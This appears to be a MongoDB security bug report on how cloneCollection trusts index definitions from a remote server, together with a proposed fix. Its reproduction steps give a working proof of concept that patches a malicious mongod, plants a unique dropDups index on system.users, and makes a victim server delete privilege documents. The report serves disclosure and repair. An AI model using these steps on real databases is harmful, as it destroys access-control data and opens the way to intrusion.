Running the command {cloneCollection:ns} creates indexes on ns, inserting one document for each result returned from the remote query db.system.indexes.find({ns:ns}). However, no input sanitization is performed to ensure that the returned index documents actually conform to the requested filter. A readWrite attacker can exploit this by instructing a remote machine to return false results, in order to create arbitrary indexes of his/her choosing on the target database. The attacker can combine this with the secondary weakness described in SERVER-8802 (creating a dropDups system.users index) to delete privilege documents.

The proposed fix is to sanitize the result of db.system.indexes.find({ns:ns}) query, to ensure that doc.ns == ns for each item in the result set.

Reproduce via:

1. Instrument remote malicious mongod to replace every incoming query filter with {name: "exploit_1"}.

perl -pi -e 's/^(        QueryMessage q\(d\);)$/\1 q.query = BSON\("name" << "exploit_1"\);/' src/mongo/db/instance.cpp
scons mongod
./mongod

2. Create index on remote malicious mongod

db.system.users.ensureIndex({exploit:1}, {name:"exploit_1", unique:true, dropDups:true})

3. Run cloneCollection on victim mongod; victim mongod blindly inserts above index document and consequently drops N-1 privilege documents from test

db.adminCommand({cloneCollection:"test.collection", from:"malicious:27017"}